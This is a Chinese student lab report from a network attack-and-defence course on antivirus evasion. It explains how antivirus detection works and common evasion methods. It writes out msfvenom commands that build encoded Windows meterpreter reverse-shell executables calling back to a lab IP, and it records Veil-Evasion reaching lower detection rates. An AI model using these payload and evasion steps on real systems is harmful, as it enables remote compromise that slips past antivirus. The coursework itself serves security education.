20145338 索朗卓嘎 《网络攻防》 免杀原理与实践

20145338 索朗卓嘎《网络攻防》 免杀原理与实践

实践内容：

(1)理解免杀技术原理(1分)
(2)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧；(2分)
(3)通过组合应用各种技术实现恶意代码免杀(1分)
(4)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（1分）

报告内容：

`基础问题回答

（1）杀软是如何检测出恶意代码的？
根据特征来检测：对已存在的流行代码特征的提取与比对
根据行为来检测：是否有更改注册表行为、是否有设置自启动、是否有修改权限等等
（2）免杀是做什么？
免杀顾名思义就是免除计算机杀软的查杀。
通过一些手段来瞒过杀软的检测扫描。
（3）免杀的基本方法有哪些？
加花指令：就是加入一些花里胡哨的指令来迷惑杀软，让杀软检测不到特征码，比如+1，-1，*1，/1什么的，但是一些厉害的杀软还可以看破这些。
加壳：就是给含有恶意代码的程序加一个外包装，让杀软不知道里面装的是什么。但是这种方法逃不过内存查杀，一运行起来就会露出马脚。
修改特征码：就是在不影响程序功能的情况下，将杀软检测的那一段特征码改一下，从而瞒过杀软的检测。当然修改特征码不是一个容易的事情，但是却是唯一可以躲过内存查杀的办法。
`实践体会
做实验总是几经波折，谢谢在实验过程中不不厌其烦耐心帮助我的同学。通过这次实验了解了几种免杀技术，实验中使用了很多种杀毒软件，但能够真正杀毒成功的却只有几个，所以平时在使用电脑的时候真需要谨慎，不点开不明链接以及在正规网站下载软件，不能过分依赖杀毒软件，自己平常中也要多加注意。

实践过程

·首先使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.164 PORT=5338-f exe > slzgtest.exe生成meterpreter可执行文件。

接着利用http://www.virscan.org/这个网站检测一下有多少查毒软件可以将其查杀出来，发现39个杀毒软件中有21可以发现病毒。

·Msfvenom使用编码器生成meterpreter可执行文件
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.43.164 LPORT= 5338-f exe > sltest.exe命令生成编码过的可执行文件sltest.exe。

上传生成的可执行文件sltest.exe，发现39个杀毒软件其中20个软件发现有病毒.

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.43.164 LPORT=5338 -f exe >slzg2.exe命令生成编码过的可执行文件slzg23test.exe


发现在39个杀毒软件中有22个软件发现有病毒.
·使用Veil-Evasion生成可执行文件
在kali中输入指令veil-evasion 进入Veil-Evasion
用python语言来编写。


在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里找到db.exe的文件夹，并且移动至win系统中。

通过上传软件发现39个杀毒软件中只有9个软件发现有病毒，相对于之前使用的两个方法相比这个的免杀效果更好。